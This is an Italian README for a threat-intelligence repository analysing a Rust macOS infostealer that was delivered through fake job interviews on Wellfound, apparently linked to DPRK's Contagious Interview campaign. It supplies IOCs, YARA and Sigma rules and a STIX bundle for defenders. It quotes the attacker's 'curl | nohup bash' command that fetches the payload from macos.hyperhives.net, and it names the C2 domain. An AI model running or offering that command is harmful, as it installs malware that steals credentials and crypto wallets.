
Analisi statica completa dell'information stealer Rust di HyperHive per macOS — 571 valori di configurazione decifrati, infrastruttura C2, attribuzione DPRK/Contagious Interview, regole YARA/Sigma, bundle STIX 2.1, layer ATT&CK Navigator
Intelligence sulle minacce: infostealer binario universale macOS basato su Rust diffuso attraverso un finto processo di colloquio di lavoro su Wellfound (ex AngelList). La persona operativa "Felix" di "HyperHive" ha indotto le vittime ad eseguire un installer malevolo da
macos.hyperhives.net. Questo repository documenta l'analisi statica completa: 571 valori di configurazione crittografati recuperati, inclusi URL C2, un Sentry DSN e 276 ID di estensioni Chrome presi di mira.
| SHA-256 del campione | 5c7385c3a4d919d30e81d851d87068dfcc4d9c5489f1c2b06da6904614bf8dd3 |
| Dominio C2 | cloudproxy.link |
| Dominio di consegna | macos.hyperhives.net |
| Piattaforma di attrazione | Wellfound (ex AngelList) |
| Persona operativa | "Felix" presso "HyperHive" |
| VirusTotal | 9 / 63 rilevamenti |
| Classificazione | Divulgazione pubblica / bundle IOC |
| Ultimo aggiornamento | Aprile 2026 |
| File | Formato | Scopo |
|---|---|---|
iocs.txt | Testo semplice | Hash, domini, URL, IP, email, Sentry ID — incollare in blocklist, MISP, OpenCTI |
yara_rules.yar | YARA 4.2+ | Corrispondenza hash di campioni noti + rilevamenti euristici di stringhe per Mach-O |
sigma_rules.yml | Sigma | Regole per proxy, DNS e creazione processi — regola logsource per il tuo SIEM |
stix/bundle.json | STIX 2.1 | Bundle CTI leggibile da macchina con indicatori, SDO malware, infrastruttura, pattern ATT&CK e relazioni |
attack-navigator-layer.json | ATT&CK Navigator | Importa in ATT&CK Navigator per la copertura visiva delle tecniche |
. ├── README.md # This report ├── iocs.txt # Flat IOC list ├── yara_rules.yar # YARA detection rules ├── sigma_rules.yml # Sigma detection rules ├── stix/ │ └── bundle.json # STIX 2.1 threat-intelligence bundle ├── attack-navigator-layer.json # ATT&CK Navigator layer ├── output/ │ ├── full_decrypted_config.json # Machine-readable decrypted configuration │ ├── iocs.json # Structured IOC export │ ├── c2_protocol.txt # C2 protocol field documentation │ ├── cargo_dependencies.txt # Embedded Rust crate list (97 crates) │ ├── source_map.txt # Reconstructed source-file layout │ └── targets.txt # Targeted applications and data paths ├── scripts/ │ ├── decrypt_all.py # Definitive config decryptor (Unicorn emulation) │ ├── analyze.py # Static analysis driver │ ├── extract_all.py # String and structure extractor │ ├── r2_analyze.py # Radare2 analysis automation │ ├── r2_targeted.py # Targeted R2 analysis for helpers │ └── validate_repo.py # CI validation script ├── sample/ │ └── README.md # Instructions for sample placement ├── Dockerfile # Analysis container image ├── docker-compose.yml # Air-gapped compose config ├── lab.sh # Helper script for Docker lab ├── SECURITY.md # Safe handling and vulnerability reporting ├── CONTRIBUTING.md # Contribution guidelines ├── CHANGELOG.md # Release history ├── LICENSE # MIT └── .github/ ├── workflows/validate.yml # CI: YARA + Sigma + file checks ├── ISSUE_TEMPLATE/ # Structured issue forms └── PULL_REQUEST_TEMPLATE.md # PR checklist
## Avvio rapido
Posiziona il campione come `sample/installer_binary` (vedi [`sample/README.md`](https://github.com/darksp33d/hyperhives-macos-infostealer-analysis/blob/main/sample/README.md) per la verifica dell'hash), quindi:```bash
docker compose build
docker compose run --rm lab python3 /lab/scripts/decrypt_all.py
Il file compose impone network_mode: none, read_only: true e rimuove tutte le capacità Linux. Consulta SECURITY.md per le linee guida complete.
Un annuncio di lavoro su Wellfound (ex AngelList) ha portato a una catena di social engineering via email multipla da parte di un operatore con il personaggio "Felix" di "HyperHive". Dopo aver lodato il background tecnico del bersaglio e aver fissato un finto colloquio, l'attaccante ha invitato la vittima a "visionare il prodotto" su hyperhives.net e a esaminare specificamente Settings → Diagnostics → Log — un pretesto per innescare l'esecuzione di:```
curl -s https://macos.hyperhives.net/install | nohup bash &
Il payload è un **binario universale Mach-O da 8.5 MB** (x86_64 + arm64) compilato in Rust. L'analisi statica con un laboratorio Docker isolato (air-gapped) e l'emulazione CPU di **570 routine helper x86_64 uniche** ha recuperato **tutti i 571 valori di configurazione crittografati**, rivelando:
- **C2:** `cloudproxy.link` — quattro endpoint HTTPS
- **Sentry (pivot di attribuzione):** DSN completo con ID org/project su `ingest.de.sentry.io`
- **Identità della build:** utente Cargo `rootr`, nome in codice `force`, versione `9.12.1`
- **Target:** 276 ID di estensioni Chrome (portafogli crypto, gestori di password, credenziali aziendali)
Le tattiche sono in linea con le campagne **Contagious Interview collegate alla Corea del Nord** — reclutamento fittizio su piattaforme legittime, costruzione della fiducia in più passaggi, distribuzione tramite `curl | bash`, stealer Rust per macOS, ed esfiltrazione focalizzata su criptovalute.
---
## 1 — Come è iniziato
### L'esca: colloquio di lavoro falso su Wellfound